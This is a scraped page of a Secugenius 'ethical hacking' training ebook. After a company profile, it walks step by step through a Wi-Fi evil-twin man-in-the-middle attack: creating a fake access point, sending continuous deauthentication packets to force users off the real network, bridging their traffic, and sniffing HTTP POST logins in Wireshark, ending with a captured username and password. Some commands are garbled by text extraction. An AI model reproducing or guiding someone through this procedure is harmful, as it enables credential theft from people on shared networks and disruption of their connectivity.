Upload
rifqi-multazam
View
217
Download
0
Embed Size (px)
Citation preview
7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 1/12
7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 2/12
SECUGENIUS SECURITY SOLUTIONS
--------------------------------------------------------------------------------------
(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)
Company Profile:
Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student
Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS
are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius
Security Solutions are providing training in Information Security and various professional courses.
Secugenius Security Solutions is an organization which believes in inventing and implementing newideas to influence the technological minds of the youngsters
Looking at the number of Cyber Crimes since last many years, We at Secugenius Security
Solutions provides training on Ethical hacking & Cyber Security to students, IT Professionals, Bank
Employees, Police officials.
Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the
benefit of the students & making them aware of the latest trends in technological era of the
Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the
nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime
Investigation & Forensic Sciences
Secugenius provides various security solutions to its clients by securing their websites from cyber
attacks. We provide training to college students, graduates and professionals in various fields.
Education is delivered to students through two modes i.e. Regular mode and Distance mode which
are available as short term and long term courses.
In the workshops conducted by Secugenius, participants can claim to be trained by the highly
experienced & skilled corporate trainers from different parts of the nation. We believe in making
the base of students to be as strong as possible. All the modules have been designed in order to
provide students with specialized knowledge by specialized trainers.
This library was furnished, managed and funded by the Founders and Directors of Secugenius
Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of
the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security
Solutions.
This Online Digital Library has been initiated as a free resource & permanent
resource on specialization basis for every student of Team Secugenius.
7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 3/12
Wi-Fi Packet Capturing & Session Hijacking
Product ID No: SG/ODL/13001
Founder & Director: Harpreet Khattar & Kshitij Adhlakha
Resource Person: Chetan Soni
Secugenius Security Solutions
SCO-13A, Model Town Extn, Near Krishna Mandir,
Ludhiana-141002, Punjab – India
[email protected], [email protected]
www.secugenius.com , www.seculabs.in
7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 4/12
Introduction
The main Objective of this Attack is to make a Fake Access point and send thefake ARP Packets on same Wi-Fi Network from where the users are connectedand the name of fake access point is same as the name of the wireless
network reside there. So when a fake access point is created with samewireless network name then the user which is connected to original network gets disconnected and connects with your fake access point, so all the traffictunnels throughout my system and we get all details/credentials/informationof that user which is generally known as session hijacking.
Requirements
1. Backtrack Operating System (BT5)2. Virtual Machine (With USB Adapter)
3. Internet Access on your System
(This Picture is taken by Nipun Jaswal)
7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 5/12
1. Open Backtrack Operating System and start Terminal and type “iwconfig”
for checking wireless interface.
2. Start this Wireless Interface by typing this command “airmon-ng start
wlan0”.
It will enable your monitor mode (mon0).
7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 6/12
3. Start your monitor mode by typing this command “airodump-ng mon0” .
It captures data from all stations.
4. Now Setup your Fake Router by typing this command “airbase-ng –e
“faswal1234” mon0”
7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 7/12
5. Now its time to bridge all networks by typing these commands
“brctladdbrmitm” “brctladdifmitm eth0”
“brctladdifmitm at0”
7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 8/12
6. Now Setting up New configurations by typing these commands.
“ifconfig eth0 0.0.0.0 up”
“ifconfig at0 0.0.0.0 up”
7. Now it’s time to turn on MITM Interface by typing this command “ifconfig
mitm up”
7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 9/12
8. Set up the channel ID which is shown above in airodump-ng command by
typing these commands “iwconfig mon0 channel 4” or “iwconfig
wlan0 channel 4”
9. Now send the deauthentication packets to the router by typing this
command
“aireplay-ng –deauth 0 –a 00:24:97:b9:3a:90 mon0”
7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 10/12
10. Now it’s time to assigning the IP to all victims by typing this
command “dhclient3 mitm&”
11. Here you can see that one client is connected to our fake accesspoint whose bssid is “D0:DF:9A:C0:FF:7B”
7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 11/12
12. Start your Wireshark Sniffing Tool by typing this command
“wireshark&”
13. Now Select the Interface (at0) and click on START.
7/29/2019 Seculabs eBook - Wi-Fi Packet Capturing & Session Hijacking - Man in the Middle Attack
http://slidepdf.com/reader/full/seculabs-ebook-wi-fi-packet-capturing-session-hijacking-man-in-the-middle 12/12
14. Type “http contains POST” and you can see that all packets be in
your sniffing tool.
http://black.chetansoni.org/main_login.php
Username – john
Password – 1234